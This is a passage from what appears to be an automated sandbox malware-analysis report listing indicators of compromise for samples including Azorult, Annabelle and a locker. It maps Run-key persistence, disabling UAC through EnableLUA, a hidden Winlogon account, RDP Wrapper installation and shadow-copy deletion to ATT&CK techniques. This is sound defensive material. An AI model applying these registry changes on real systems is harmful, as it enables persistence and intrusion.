3388	icacls.exe
3672	icacls.exe
5384	icacls.exe
636	icacls.exe
5492	icacls.exe
232	icacls.exe
2780	icacls.exe
3200	icacls.exe
5648	icacls.exe
3320	icacls.exe
4212	icacls.exe
1108	icacls.exe
4660	icacls.exe
2640	icacls.exe
4400	icacls.exe
868	icacls.exe
5488	icacls.exe
2620	icacls.exe
4956	icacls.exe
2800	icacls.exe
2360	icacls.exe
4584	icacls.exe
4020	icacls.exe
5072	icacls.exe
5696	icacls.exe
3720	icacls.exe
224	icacls.exe
5352	icacls.exe
952	icacls.exe
5124	icacls.exe
3248	icacls.exe
4384	icacls.exe
3012	icacls.exe
232	icacls.exe
3460	icacls.exe
1096	icacls.exe
4732	icacls.exe
2712	icacls.exe
5392	icacls.exe
2360	icacls.exe
4428	icacls.exe
1968	icacls.exe
5412	icacls.exe
4236	icacls.exe
5736	icacls.exe
5868	icacls.exe
5500	icacls.exe
3600	icacls.exe
2200	icacls.exe
1796	icacls.exe
5764	icacls.exe
3640	icacls.exe
4732	icacls.exe
5496	icacls.exe
2656	icacls.exe
5424	icacls.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000232d0-136.dat	upx
behavioral2/memory/3132-140-0x00007FFD09360000-0x00007FFD09A39000-memory.dmp	upx
behavioral2/files/0x0007000000023282-142.dat	upx
behavioral2/memory/3132-147-0x00007FFD16AC0000-0x00007FFD16AE5000-memory.dmp	upx
behavioral2/files/0x00070000000232ca-149.dat	upx
behavioral2/memory/3132-151-0x00007FFD1FEB0000-0x00007FFD1FEBF000-memory.dmp	upx
behavioral2/files/0x0007000000023285-153.dat	upx
behavioral2/memory/3132-154-0x00007FFD164D0000-0x00007FFD164E9000-memory.dmp	upx
behavioral2/files/0x0007000000023280-152.dat	upx
behavioral2/memory/3132-156-0x00007FFD15BC0000-0x00007FFD15BED000-memory.dmp	upx
behavioral2/files/0x000700000002327f-202.dat	upx
behavioral2/files/0x00070000000232d6-200.dat	upx
behavioral2/files/0x00070000000232d4-199.dat	upx
behavioral2/files/0x00070000000232d3-198.dat	upx
behavioral2/files/0x00070000000232ce-197.dat	upx
behavioral2/files/0x00070000000232cb-196.dat	upx
behavioral2/files/0x00070000000232c9-195.dat	upx
behavioral2/memory/3132-203-0x00007FFD1D6A0000-0x00007FFD1D6AD000-memory.dmp	upx
behavioral2/memory/3132-204-0x00007FFD15BA0000-0x00007FFD15BB9000-memory.dmp	upx
behavioral2/memory/3132-205-0x00007FFD164A0000-0x00007FFD164AD000-memory.dmp	upx
behavioral2/memory/3132-206-0x00007FFD15B90000-0x00007FFD15B9D000-memory.dmp	upx
behavioral2/memory/3132-207-0x00007FFD085E0000-0x00007FFD08613000-memory.dmp	upx
behavioral2/memory/3132-208-0x00007FFD09360000-0x00007FFD09A39000-memory.dmp	upx
behavioral2/memory/3132-209-0x00007FFD16AC0000-0x00007FFD16AE5000-memory.dmp	upx
behavioral2/memory/3132-210-0x00007FFD08510000-0x00007FFD085DD000-memory.dmp	upx
behavioral2/memory/3132-212-0x00007FFD07FE0000-0x00007FFD08509000-memory.dmp	upx
behavioral2/memory/3132-213-0x00007FFD1D650000-0x00007FFD1D666000-memory.dmp	upx
behavioral2/memory/3132-214-0x00007FFD15760000-0x00007FFD15772000-memory.dmp	upx
behavioral2/memory/3132-215-0x00007FFD15720000-0x00007FFD15755000-memory.dmp	upx
behavioral2/memory/3132-216-0x00007FFD15BC0000-0x00007FFD15BED000-memory.dmp	upx
behavioral2/memory/3132-218-0x00007FFD1D6A0000-0x00007FFD1D6AD000-memory.dmp	upx
behavioral2/memory/3132-217-0x00007FFD156F0000-0x00007FFD15714000-memory.dmp	upx
behavioral2/memory/3132-219-0x00007FFD08EB0000-0x00007FFD09026000-memory.dmp	upx
behavioral2/memory/3132-220-0x00007FFD156D0000-0x00007FFD156E8000-memory.dmp	upx
behavioral2/memory/3132-221-0x00007FFD08E90000-0x00007FFD08EA4000-memory.dmp	upx
behavioral2/memory/3132-223-0x00007FFD156C0000-0x00007FFD156CB000-memory.dmp	upx
behavioral2/memory/3132-224-0x00007FFD07E00000-0x00007FFD07F1B000-memory.dmp	upx
behavioral2/memory/3132-225-0x00007FFD085E0000-0x00007FFD08613000-memory.dmp	upx
behavioral2/memory/3132-226-0x00007FFD07FE0000-0x00007FFD08509000-memory.dmp	upx
behavioral2/memory/3132-227-0x00007FFD08E60000-0x00007FFD08E87000-memory.dmp	upx
behavioral2/memory/3132-228-0x00007FFD07C00000-0x00007FFD07C0B000-memory.dmp	upx
behavioral2/memory/3132-229-0x00007FFD07BF0000-0x00007FFD07BFC000-memory.dmp	upx
behavioral2/memory/3132-231-0x00007FFD08510000-0x00007FFD085DD000-memory.dmp	upx
behavioral2/memory/3132-230-0x00007FFD0F3F0000-0x00007FFD0F3FB000-memory.dmp	upx
behavioral2/memory/3132-232-0x00007FFD07BB0000-0x00007FFD07BBC000-memory.dmp	upx
behavioral2/memory/3132-233-0x00007FFD07BA0000-0x00007FFD07BAB000-memory.dmp	upx
behavioral2/memory/3132-236-0x00007FFD07FC0000-0x00007FFD07FCB000-memory.dmp	upx
behavioral2/memory/3132-235-0x00007FFD07FD0000-0x00007FFD07FDC000-memory.dmp	upx
behavioral2/memory/3132-237-0x00007FFD07FA0000-0x00007FFD07FAC000-memory.dmp	upx
behavioral2/memory/3132-234-0x00007FFD07BE0000-0x00007FFD07BEC000-memory.dmp	upx
behavioral2/memory/3132-239-0x00007FFD07F60000-0x00007FFD07F72000-memory.dmp	upx
behavioral2/memory/3132-238-0x00007FFD07F80000-0x00007FFD07F8D000-memory.dmp	upx
behavioral2/memory/3132-240-0x00007FFD07F50000-0x00007FFD07F5C000-memory.dmp	upx
behavioral2/memory/3132-243-0x00007FFD08E40000-0x00007FFD08E4E000-memory.dmp	upx
behavioral2/memory/3132-242-0x00007FFD08E50000-0x00007FFD08E5C000-memory.dmp	upx
behavioral2/memory/3132-245-0x00007FFD07F90000-0x00007FFD07F9C000-memory.dmp	upx
behavioral2/memory/3132-244-0x00007FFD07FB0000-0x00007FFD07FBB000-memory.dmp	upx
behavioral2/memory/3132-241-0x00007FFD07BC0000-0x00007FFD07BCB000-memory.dmp	upx
behavioral2/memory/3132-246-0x00007FFD07910000-0x00007FFD07B93000-memory.dmp	upx
behavioral2/memory/3132-247-0x00007FFD07F20000-0x00007FFD07F4E000-memory.dmp	upx
behavioral2/memory/3132-248-0x00007FFD163B0000-0x00007FFD163D9000-memory.dmp	upx
behavioral2/memory/3132-249-0x00007FFD09360000-0x00007FFD09A39000-memory.dmp	upx
behavioral2/memory/3132-250-0x00007FFD16AC0000-0x00007FFD16AE5000-memory.dmp	upx
behavioral2/memory/3132-252-0x00007FFD164D0000-0x00007FFD164E9000-memory.dmp	upx

Adds Run key to start application 2 TTPs 16 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateBackup = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
135	raw.githubusercontent.com
136	raw.githubusercontent.com
153	raw.githubusercontent.com
154	raw.githubusercontent.com
157	iplogger.org
161	iplogger.org
180	raw.githubusercontent.com
181	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	api.ipify.org
16	api.ipify.org
142	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00080000000232bf-897.dat	autoit_exe
behavioral2/files/0x00080000000232d3-993.dat	autoit_exe
behavioral2/files/0x00080000000232dd-1049.dat	autoit_exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe

Drops file in Program Files directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files\Cezurity	Azorult.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File opened for modification	C:\Program Files\ESET	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3404	sc.exe
6072	sc.exe
3588	sc.exe
3732	sc.exe
4048	sc.exe
6068	sc.exe
4368	sc.exe
3284	sc.exe
3168	sc.exe
2820	sc.exe
2672	sc.exe
5372	sc.exe
5212	sc.exe
5176	sc.exe
980	sc.exe
5780	sc.exe
5440	sc.exe
5808	sc.exe
2868	sc.exe
5160	sc.exe
5232	sc.exe
5400	sc.exe
820	sc.exe
4504	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5316	schtasks.exe
344	schtasks.exe
3600	schtasks.exe
5236	schtasks.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
5792	timeout.exe
3732	timeout.exe
5108	timeout.exe
3404	timeout.exe
3656	timeout.exe
3476	timeout.exe
1408	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5584	ipconfig.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
4960	vssadmin.exe
4872	vssadmin.exe
1192	vssadmin.exe
1252	vssadmin.exe
5844	vssadmin.exe
3732	vssadmin.exe
3540	vssadmin.exe
4744	vssadmin.exe
344	vssadmin.exe
3492	vssadmin.exe
2344	vssadmin.exe
5056	vssadmin.exe
2680	vssadmin.exe
4012	vssadmin.exe
3284	vssadmin.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
4480	taskkill.exe
5600	taskkill.exe
5884	taskkill.exe
4476	taskkill.exe
5276	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "124"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{D539A6DA-A60B-45E7-878A-C62797A6C3D4}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	R8.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Nicht bestätigt 418093.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Nicht bestätigt 382947.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Nicht bestätigt 618199.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe

Runs .reg file with regedit 2 IoCs

pid	Process
5952	regedit.exe
5192	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4408	taskmgr.exe
4432	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
672	Process not Found
672	Process not Found
672	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe
1920	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4584	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3132	NameItwhatever.exe
Token: SeIncreaseQuotaPrivilege	4392	WMIC.exe
Token: SeSecurityPrivilege	4392	WMIC.exe
Token: SeTakeOwnershipPrivilege	4392	WMIC.exe
Token: SeLoadDriverPrivilege	4392	WMIC.exe
Token: SeSystemProfilePrivilege	4392	WMIC.exe
Token: SeSystemtimePrivilege	4392	WMIC.exe
Token: SeProfSingleProcessPrivilege	4392	WMIC.exe
Token: SeIncBasePriorityPrivilege	4392	WMIC.exe
Token: SeCreatePagefilePrivilege	4392	WMIC.exe
Token: SeBackupPrivilege	4392	WMIC.exe
Token: SeRestorePrivilege	4392	WMIC.exe
Token: SeShutdownPrivilege	4392	WMIC.exe
Token: SeDebugPrivilege	4392	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4392	WMIC.exe
Token: SeRemoteShutdownPrivilege	4392	WMIC.exe
Token: SeUndockPrivilege	4392	WMIC.exe
Token: SeManageVolumePrivilege	4392	WMIC.exe
Token: 33	4392	WMIC.exe
Token: 34	4392	WMIC.exe
Token: 35	4392	WMIC.exe
Token: 36	4392	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4392	WMIC.exe
Token: SeSecurityPrivilege	4392	WMIC.exe
Token: SeTakeOwnershipPrivilege	4392	WMIC.exe
Token: SeLoadDriverPrivilege	4392	WMIC.exe
Token: SeSystemProfilePrivilege	4392	WMIC.exe
Token: SeSystemtimePrivilege	4392	WMIC.exe
Token: SeProfSingleProcessPrivilege	4392	WMIC.exe
Token: SeIncBasePriorityPrivilege	4392	WMIC.exe
Token: SeCreatePagefilePrivilege	4392	WMIC.exe
Token: SeBackupPrivilege	4392	WMIC.exe
Token: SeRestorePrivilege	4392	WMIC.exe
Token: SeShutdownPrivilege	4392	WMIC.exe
Token: SeDebugPrivilege	4392	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4392	WMIC.exe
Token: SeRemoteShutdownPrivilege	4392	WMIC.exe
Token: SeUndockPrivilege	4392	WMIC.exe
Token: SeManageVolumePrivilege	4392	WMIC.exe
Token: 33	4392	WMIC.exe
Token: 34	4392	WMIC.exe
Token: 35	4392	WMIC.exe
Token: 36	4392	WMIC.exe
Token: SeDebugPrivilege	4408	taskmgr.exe
Token: SeSystemProfilePrivilege	4408	taskmgr.exe
Token: SeCreateGlobalPrivilege	4408	taskmgr.exe
Token: SeDebugPrivilege	964	rutserv.exe
Token: SeDebugPrivilege	5348	rutserv.exe
Token: SeTakeOwnershipPrivilege	5100	rutserv.exe
Token: SeTcbPrivilege	5100	rutserv.exe
Token: SeTcbPrivilege	5100	rutserv.exe
Token: SeDebugPrivilege	5276	taskkill.exe
Token: SeDebugPrivilege	4480	taskkill.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	5600	taskkill.exe
Token: SeAuditPrivilege	1556	svchost.exe
Token: SeDebugPrivilege	1156	RDPWInst.exe
Token: SeAuditPrivilege	3892	svchost.exe
Token: SeDebugPrivilege	5884	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: 33	4408	taskmgr.exe
Token: SeIncBasePriorityPrivilege	4408	taskmgr.exe
Token: SeBackupPrivilege	3588	vssvc.exe
Token: SeRestorePrivilege	3588	vssvc.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
